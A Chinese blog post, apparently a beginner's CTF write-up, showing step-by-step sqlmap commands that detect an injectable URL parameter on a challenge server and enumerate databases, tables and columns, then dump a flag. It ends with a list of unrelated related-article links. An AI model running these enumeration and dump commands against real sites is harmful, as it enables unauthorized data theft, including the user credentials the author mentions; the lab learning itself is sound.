SQLMap简单尝试
第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的
简单介绍注入时后台的数据等级,有助于后面的理解
①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库
②库的下一级是表,相当于一个文件中存在的sheet表
③表的下级是列
④每一列中又有字段,可以相当于excel中的一个格格啦
简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦
1、获得注入点,一般在URL末尾存在参数
2、爆出所有数据库名称
3、选定数据库,列出其中的表
4、列出选定表中的列
5、列出选定列中的所有字段
6、爆出相应字段
下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则,这次先隐藏,求轻踩)
网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯
1、检测注入点可用
sqlmap -u http://game.sycsec.com:2007/?sycid=1
-u :指定注入url
2、暴库
sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs
--dbs :曝出该sqlserver中所有数据库名称
结果:好像看到了很有趣的“f1ag”库
3、列出数据库中的表
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag --tables
-D:指定数据库名称(datebase)
--tables:列出表
可以看到“f1ag”下只有一个“flag”表
4、列出表中的列
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag --columns
-T:指定表名(table)
--columns:打印列名
结果:这里列出了表中的两个列,
这里有个问题,在图形展示的列的名字是不完整的,而应该去上面箭头位置寻找完整的列名
5、爆出此列中的字段
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag -C f4ag --dump
-C :指定要暴的列
--dump:把字段展示出来
结果:就看到我们最喜欢的flag啦!
除了这些,还可以爆网站的用户名密码,以后有机会试试咯
参考网站:http://blog.csdn.net/zgyulongfei/article/details/41017493
作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;
SQLMap简单尝试的更多相关文章
- 简单尝试Spring Cloud Gateway
简单尝试Spring Cloud Gateway 简介 Spring Cloud Gateway是一个API网关,它是用于代替Zuul而出现的.Spring Cloud Gateway构建于Sprin ...
- python+selenium 简单尝试
前言 selenium是一种自动化测试工具,简单来说浏览器会根据写好的测试脚本自动做一些操作. 关于自动化测试,一开始接触的是splinter,但是安装的时候发现它是基于selenium的,于是打算直 ...
- react-native学习笔记——简单尝试
毫无疑问,我是个不善于写博文的人. 毫无疑问,react是个出的框架. 毫无疑问,react-native更是个牛逼的引擎. 我个人对react-native的理解就是js被js引擎编译,去调用本地语 ...
- 关于MS12-020一次简单尝试
由于之前着重于web漏洞,主机漏洞这块比较薄弱.也没有用过metasploit,对于很多系统漏洞还不熟悉,正好这几天不忙,就想着慢慢学习,再写点简单的东西,进行总结记录. 这次尝试的是MS12-020 ...
- sqlmap简单使用
就以实验吧上那个简单的sql注入题为例吧,不过那道题确实经典,把sqlmap的整个使用过程都展现了一遍,先奉上那道题的地址:http://ctf5.shiyanbar.com/web/index_3. ...
- sqlmap简单中文说明
首先下载需要的文件,如果是windows环境直接到http://sqlmap.org/下载安装所需要的文件即可. 更新 svn checkout https://svn.sqlmap.org/sqlm ...
- sqlmap简单流程使用
-u “(url)” 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...
- 简单尝试利用vultr vps自架PPTP上网用于工作学习需要
因为学习和工作的需要用到登陆海外网站查阅相关的资料和文档,之前有需要使用的时候是问网友索要的账户登录本地电脑拨号的,但是老是跟别人要还是不好,决定自己尝试搭建一个长期使用.看到有不少的介绍提到VULT ...
- mysql sqlmap 注入尝试
假设注入点为 http://www.abc.com/news.php?id=12 //探测数据库信息 sqlmap -u http://www.abc.com/news.php?id=12 –dbs ...
随机推荐
- 树的三种遍历方式(C语言实现)
//************************************************************************* // [前序]遍历算法 //二叉树不空,先访问根 ...
- poj 1254 Hansel and Grethel
Hansel and Grethel Time Limit: 1000MS Memory Limit: 10000K Total Submissions: 2199 Accepted: 100 ...
- 暑假练习赛 007 A - Time
A - Time Description standard input/outputStatements A plane can go from city X to city Y in 1 hour ...
- 使用Identity Server 4建立Authorization Server (3)
预备知识: http://www.cnblogs.com/cgzl/p/7746496.html 第一部分: http://www.cnblogs.com/cgzl/p/7780559.html 第二 ...
- 利用canvas 导出图片
1.使用canvas绘制图片,并将图片导出. 在本地直接访问静态网页时,无法使用toDataURL(),需要将网页发布后,canvas才能使用toDataURL获取画布上的内容.因为canvas不允许 ...
- 密码学那些事———SHA-512及其C++实现
SHA-512及其C++实现 转载请注明出处 一.引言 相信大家对于哈希压缩加密算法应该不陌生,在我们用微信或者支付宝接口的时候经常会遇到用这类算法加密,以验证数据的完整性.可以说这类算法无处不在,那 ...
- Python 字典和json的本质区别(个人理解)
个人理解:字典和json显示的时候差不多,但是数据类型不同(如下图): 字典的类型是字典dict json的类型是字符串str 接口测试是传参数payload时有时候是传的字符串,应该将payload ...
- Remove Untagged Images From Docker
I've been playing around a lot with docker. It's awesome, and it creates a whole new world of possib ...
- JavaScript系列----正则表达式
1.正则表达式 1.1.正则表达式的类型 正则表达式在JavaScript中,提供了一种内置的构造函数--RegExp. 正则表达式有三种匹配模式: g: 表示全局模式,即模式应用于所有的字符串,而非 ...
- NOIP2017衢二中旅游记Day 1
NOIP前一天下午早早的去了衢州: 车程大概在4个半小时左右: 车上大家都一脸颓废,并混杂着动听的音乐: 到了衢州二中,立刻跑去吃晚饭: 吃饭的队伍特别长,吃面的却空无一人: 我毅然决然地选择了去吃面 ...